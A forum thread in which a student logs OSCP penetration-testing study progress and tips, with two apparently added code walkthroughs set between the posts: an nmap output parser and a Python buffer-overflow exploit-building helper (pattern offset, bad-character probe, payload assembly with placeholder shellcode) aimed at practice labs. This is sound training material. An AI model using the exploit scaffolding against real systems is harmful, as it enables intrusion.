OSCP - aka: Running head first into a brick wall - a journey

BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
TLDR: I will post updates on my progress. Each update will include a section of "quick tips" to help other students, along with progress updates -- this is all so that I can help pass along information.


I will be starting my OSCP journey in mid October.

I am very excited as this has been a goal of mine for many years now. I have been following the offsec guys for a long time as I have used Kali quite a bit! I remember when Kali was sort of an obscure distro ....

To add to the pressure: I am also actively enrolled in the Cisco CyberOps course in cohort 4 ..... You know because I love running head first into a brick wall ...

I plan on posting my progress, resources, and frustration here. I know there are quite a few people that follow these threads to help them prepare. I did a CEH post as well, and I like that I can help people even if in a small way. Although I am enrolled in both the Cisco course and the OSCP, this thread will be focused on OSCP.

Some background:
I have quite a few years in "IT" (10+) in many areas. Currently I am the equivalent of a solutions architect. Security is not new to me, however it is not my primary job role. I really started cramming it in when I took my CEH last year, but I am a bit rusty ... Time to shake that rust off.

I am self taught in most everything I know as I did not go to school. I learn best by jumping in ... I don't scare away easily

Motivation:
This is mostly a personal goal as I don't have a strong desire to jump into a strict red team role right away. This to me is one of the crowning achievements in my certification path. Even though I am not going to immediately shift to pentesting, my current position will benefit greatly from the knowledge I'll gain which is why they are sponsoring me. Many of our customers rely on us for security recommendations

Personal Challenges:
Even though my employer is sponsoring me, this in no way makes my day job any easier or less time consuming. So I will be cramming this in along with my day job, the Cisco Cyber course, family time (I have children), two upcoming vacations, and just general life stuff. I am confident I can do it. And I want to do it to prove to those on here that it can be done even with a busy schedule.

Stay tuned for updates. I plan on posting some "prep" material.

Comments

  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    My start date is 14 OCT! Stay Tuned
  • IntrusionNewbIntrusionNewb Registered Users Posts: 21 ■■□□□□□□□□
    Good luck. I'll be following.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    I got through all of the registration process yesterday.

    This weekend, I am spending some time doing some light reading, and following up on a lot of the materials I used when going through my CEH prep.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Pre-Start WEEK
    The clock is ticking until my start date. I have been using this time to do a few things:
    1. Continue working on my Cisco CCNA studies
    2. Brush up on notes and books used for the CEH
    3. Begin building my own system for a "database" of resources for quick reference
    4. Talking to other students on the IRC #offsec channel
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    WEEK 1

    I got my materials last week. I must say the materials are pretty good. The videos are well done, and the PDF is easy to read without a lot of needless words like many other books. The author does a good job at getting to the point of things.

    My study was a bit slow this past week as I was doing some traveling, which really cut into my productivity. I am still reading through the materials and watching the videos. I plan on getting through the rest of the materials and videos in the next couple of days.

    Quick tips:
    1. You really should know networking before you get going on this stuff. They do a good job at breaking the ice on other stuff, but if you don't know subnetting, how ports work, TCP, and IP, etc ... it's gonna be tough on you. I have a very firm grasp on these things, but I could see how someone could be overwhelmed just from the first chapter ...
    2. Make sure you are taking good notes. It just helps down the road.
    3. Some scans will take a long time! These are best executed while you are sleeping.



    Material:
    I am about half way through the Material

    Lab:
    I have started to assemble a road map of the systems in the lab with some basic sweeps, scans, and the like.

    Oh I also got a kick ass new laptop sticker! It added l33t hax0r skillz instantly
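The "road map" of lab systems that the post above describes is usually built from scan output rather than by hand. The following is an added example, not code from the thread or from Offensive Security: it parses nmap's greppable (`-oG`) output into a per-host table of open ports so the results of an overnight scan can be dropped into your notes and searched. The scan lines are constructed samples (the `10.11.1.x` addresses, hostnames and service banners are made up), and the parser assumes the documented `-oG` port field layout `port/state/proto/owner/service/rpc/version/`.

```python
import re

# Constructed sample of nmap -oG output; not a real scan of anything.
SAMPLE_GNMAP = "\n".join([
    "# Nmap 7.70 scan initiated (constructed sample, not a real scan)",
    "Host: 10.11.1.5 (lab-web)\tStatus: Up",
    "Host: 10.11.1.5 (lab-web)\tPorts: 22/open/tcp//ssh//OpenSSH 4.7p1 Debian 8ubuntu1/, "
    "80/open/tcp//http//Apache httpd 2.2.8/, 139/filtered/tcp//netbios-ssn///\tIgnored State: closed (997)",
    "Host: 10.11.1.8 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, "
    "445/open/tcp//microsoft-ds//Microsoft Windows XP microsoft-ds/\tIgnored State: closed (998)",
    "# Nmap done -- 2 IP addresses (2 hosts up) scanned",
])

# Field order inside each "Ports:" entry of greppable output.
PORT_FIELDS = ("port", "state", "proto", "owner", "service", "rpc", "version")
HOST_RE = re.compile(r"Host: (\S+) \((.*?)\)")


def parse_gnmap(text):
    """Return ({ip: [port records]}, {ip: hostname}) from -oG text.

    Tab-separated fields; a host may appear on several lines (Status, Ports),
    so hosts are recorded even when a line carries no Ports field."""
    hosts, names = {}, {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                       # comments and "Nmap done" lines
        fields = line.split("\t")
        m = HOST_RE.match(fields[0])
        if not m:
            continue
        ip, name = m.group(1), m.group(2)
        names[ip] = name
        hosts.setdefault(ip, [])
        for field in fields[1:]:
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].strip().split(", "):
                # Trailing slash yields an empty 8th element; zip() drops it.
                rec = dict(zip(PORT_FIELDS, entry.split("/")))
                rec["port"] = int(rec["port"])
                hosts[ip].append(rec)
    return hosts, names


def open_ports(hosts, ip):
    """Sorted list of open port numbers for one host (filtered ports excluded)."""
    return sorted(r["port"] for r in hosts.get(ip, []) if r["state"] == "open")


def hosts_with_open_port(hosts, port):
    """Which lab hosts expose a given port: the 'where is SMB open?' question."""
    return sorted(ip for ip, recs in hosts.items()
                  if any(r["port"] == port and r["state"] == "open" for r in recs))


def roadmap(hosts, names):
    """Plain-text table of open ports, ordered by IP, ready to paste into notes."""
    def ip_key(ip):
        return tuple(int(o) for o in ip.split("."))
    lines = []
    for ip in sorted(hosts, key=ip_key):
        for r in hosts[ip]:
            if r["state"] != "open":
                continue
            lines.append(f"{ip:<15} {names.get(ip) or '-':<10} "
                         f"{r['port']:>5}/{r['proto']} {r['service']:<14} {r['version']}")
    return "\n".join(lines)


if __name__ == "__main__":
    hosts, names = parse_gnmap(SAMPLE_GNMAP)
    print(roadmap(hosts, names))
    print("SMB hosts:", hosts_with_open_port(hosts, 445))
```

Feed it the `.gnmap` file written by `nmap -oA` (or `-oG`) and it produces the same table for the whole lab range; the version column is what you grep later when you need every host running a particular service build.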
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    Could you show us the sticker? :)
    Booya!!
    WIP : | CISSP [2018] | CISA [2018] | CAPM [2018] | eCPPT [2018] | CRISC [2019] | TORFL (TRKI) B1 | Learning: | Russian | Farsi |
    *****You can fail a test a bunch of times but what matters is that if you fail to give up or not*****
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Week Two - Start of the week

    I got a lot of studying done last night. Being that I mostly was reading up until this point ... I was able to power through the exercises that I had to skip over due to my schedule last week. I learned quite a few new tips and tricks that I didn't know before, and that's always a good feeling. I'm caught up on reading, watching, and exercise reporting. Now, I am about to dive into Buffer Overflows -- which will be challenging I imagine, as I have limited experience with these.

    Quick Tips:
    - DO THE EXERCISES ... you will learn so much more - even the ones that seem like they would be way too easy to be any sort of fun ...
    - Some lab exercises will not be as black and white as they appear. I had to modify a few things to get a couple of exercises to work.
    - From time to time, snapshot your Kali box. I've already had to revert it a couple of times due to OpenVAS issues.
    - Keep good notes. A lot of studying for me is done late at night. In the morning I review all the notes I took the night before, and it helps me not lose information to sleep deprivation.
    - If you are using KeepNote, or something like that, just take a quick backup of those note files from time to time!

    Materials:
    Buffer overflows ... here I come

    Lab:
    I gave myself a strict(ish) rule that I wouldn't "attack" the labs until I got through my material. But I have already found 3 VMs that I could pop easily with exploits I've actually used before in other labs.

    Rooted: 0 (not yet started)
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    I plan to start in November or December when work lets up a bit. I am trying to pre-study. How many days did you sign up for?
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    dr_fsmo wrote:
    I plan to start in November or December when work lets up a bit. I am trying to pre-study. How many days did you sign up for?

    I am enrolled for 60 days, mostly because I'm not entirely new to the concepts in the course. That, and that's about all I could get for training cost coverage - I'll pay out of pocket if I need additional time.

    As for pre-study: It will sound corny, but check out Cybrary. Georgia W has a good pentesting course. Also, The Hacker Playbook 2. If you can watch that and practice some of those skills, then you will be off to a good start. Also, make sure you know networking pretty well. An in-depth primer (sort of an oxymoron) would be a good starter. Something that covers subnets, ports, OSI, three-way handshake, etc - you don't need to be a CCIE here ... but a good understanding of the basics will help.
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    Are you in any of the study groups on Discord or Slack? I have started Georgia's book and Cybrary series as well.
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    Good luck on the buffer overflow stuff! I'm having the hardest time with that on the eCPPT stuff.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    dr_fsmo wrote:
    Are you in any of the study groups on Discord or Slack? I have started Georgia's book and Cybrary series as well.

    No I'm not. I wasn't aware that there were study groups. I think both of those require invite.
  • dr_fsmodr_fsmo Member Posts: 15 ■□□□□□□□□□
    There is a study group in slack and one in discord. I hope to obtain an invite with more time in the forums here.
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Quick Update:

    Working on BoF

    Buffer Overflows are (according to other blogs) a big part of the lab, and ultimately the exam. While it seems that passing the exam with a weak understanding of overflows is possible, it's better to have a firm understanding.

    As such, I have built a Buffer Overflow lab to practice various things. Admittedly it took me a little longer than I would have liked to get it fully set up, but essentially you can set up the same lab with a Windows 7 machine (SP1 works best), Immunity Debugger, and a box such as Kali. -- I was working on this lab very late at night, and couldn't figure out why the C++ redist wouldn't install, only to find out I wasn't running SP1 (... dumb)

    If you are struggling with Buffer Overflows, you should check out the following https://github.com/justinsteven/dostackbufferoverflowgood
    Also a good blog entry from vortex: https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

    Quicktips:
    - Don't be scared of Buffer Overflows. Its execution is very tedious, but what is happening can be understood pretty quickly.
    - Realize that Buffer Overflows are actually a bit more common than you'd realize. If you can understand these, you will begin to understand a lot of the inner workings of exploits.
    - Take time to read other materials on BoF.
    - Take time to build a lab.

    Materials:
    I just wrapped up the Overflow sections and have put the material on hold until I have a better grasp as a whole. I am spending the next few days working on my own lab for Overflows.
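The tedious part the post above refers to is the fixed sequence every PWK-style stack overflow walks through: crash the service with a unique pattern, read EIP in the debugger to get the offset, send all 256 byte values to find the ones the target mangles, then assemble junk + return address + NOP sled + shellcode. The block below is an added example written for this thread, not code from the post, the course, or the linked GitHub repos; it implements those helper steps in Python, which is what the exploit scripts in this kind of lab are written in. It assumes a 32-bit x86 target (little-endian, 4-byte EIP); the EIP value `42306142`, the truncated memory dump, and the return address `0x625011AF` are constructed placeholders, not values from any real target.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# Upper * lower * digit triples before the sequence would repeat.
MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes


def cyclic_pattern(length):
    """Metasploit-style unique pattern (Aa0Aa1Aa2...), the same bytes that
    pattern_create.rb emits, so every 4-byte window occurs exactly once."""
    if length > MAX_PATTERN:
        raise ValueError("pattern would repeat past 20280 bytes")
    out = bytearray()
    for u, l, d in product(ascii_uppercase, ascii_lowercase, digits):
        out += f"{u}{l}{d}".encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip_hex):
    """Take EIP as the debugger displays it (e.g. '42306142') and return the
    offset of the bytes that landed in it. x86 is little-endian, so the four
    bytes are reversed before searching the pattern."""
    needle = bytes.fromhex(eip_hex)[::-1]
    idx = cyclic_pattern(MAX_PATTERN).find(needle)
    if idx < 0:
        raise ValueError(f"{eip_hex} not in pattern; EIP may not come from this buffer")
    return idx


def badchar_probe(exclude=(0x00,)):
    """Every byte 0x01..0xff except those already known to be bad. Sent right
    after the offset so a memory dump at ESP shows which bytes survived."""
    return bytes(b for b in range(1, 256) if b not in exclude)


def first_mangled_byte(sent, observed):
    """Compare the probe with the bytes seen in the debugger's dump; return the
    first byte value that was altered or truncated, or None if all arrived."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def build_payload(offset, ret_addr, shellcode, total_len, nop_sled=16):
    """Classic layout: junk up to EIP, the return address (a JMP ESP, packed
    little-endian), a NOP sled, the shellcode, then padding to the crash length
    so the send looks exactly like the crash that was already confirmed."""
    payload = (b"A" * offset + struct.pack("<I", ret_addr)
               + b"\x90" * nop_sled + shellcode)
    if len(payload) > total_len:
        raise ValueError("payload exceeds the crash length")
    return payload.ljust(total_len, b"C")


if __name__ == "__main__":
    offset = pattern_offset("42306142")            # constructed EIP value
    print("EIP offset:", offset)
    probe = badchar_probe()
    # Constructed dump: a service that truncates input at a line feed (0x0a).
    dump = probe[:probe.index(0x0a)] + b"\x00" * 8
    print("first bad char:", hex(first_mangled_byte(probe, dump)))
    # 0x625011AF is a placeholder; use the JMP ESP address you find yourself.
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 4, 1000)
    print(len(payload), "bytes, EIP slot =", payload[offset:offset + 4].hex())
```

Run the bad-character step repeatedly: after each mangled byte is found, add it to `exclude` and resend, because a byte the service rejects can hide every byte after it. The `\xcc` shellcode here is just an INT3 so the debugger breaks when the sled is reached; swap in real shellcode generated with the collected bad characters excluded.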
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Week Three (sort of ... Week Two)
    REDACTED
    Root: None (haven't started)
  • CyberCop123CyberCop123 Member Posts: 338 ■■■■□□□□□□
    Good progress and good tips. I should probably do a bit more on gcc as I was getting really really frustrated that almost every exploit had huge errors when trying to compile.

    What machines did you get root on?

    Try out the MiniShare buffer overflow exploit. It's a really nice one, and I found it satisfying to replicate on my own Windows XP lab machine.

    I'm at the point now where I feel I've learned everything obvious from the textbooks. My issue is now execution. Realising what fits where.

    I'm still mystified by SMB services and to some extent SNMP. I can enumerate them but not sure if I should be doing more with it.
    My Aims
    2017: OSCP - COMPLETED
    2018: CISSP - COMPLETED
    2019: GIAC GNFA - Advanced Network Forensics & Threat Hunting - COMPLETED
          GIAC GREM - Reverse Engineering of Malware - COMPLETED
    2021: CCSP
    2022: OSWE (hopefully)
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Update:

    Redacted

    rooted: 3
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    UPDATE:

    Redacted

    ROOTED: 7
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted

    Rooted: 7
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted

    rooted: 8
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted

    rooted: 9
  • jamesleecolemanjamesleecoleman Member Posts: 1,899 ■■■■■□□□□□
    This is kinda like watching a match or something. I'm really enjoying reading about your success!
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    Redacted
    ROOTED: 11

    Redacted
  • LonerVampLonerVamp Member Posts: 518 ■■■■■■■■□□
    I find that hit order strange, but I can't say why, lol.

    Security Engineer/Analyst/Geek, Red & Blue Teams
    OSCP, GCFA, GWAPT, CISSP, OSWP, AWS SA-A, AWS Security, Sec+, Linux+, CCNA Cyber Ops, CCSK
    2021 goals: maybe AWAE or SLAE, bunch o' courses and red team labs?
  • BuzzSawBuzzSaw Member Posts: 259 ■■■□□□□□□□
    LonerVamp wrote:
    I find that hit order strange, but I can't say why, lol.

    I didn't take them down in that order :)

    If you are in the labs, you'll see why I listed them that way.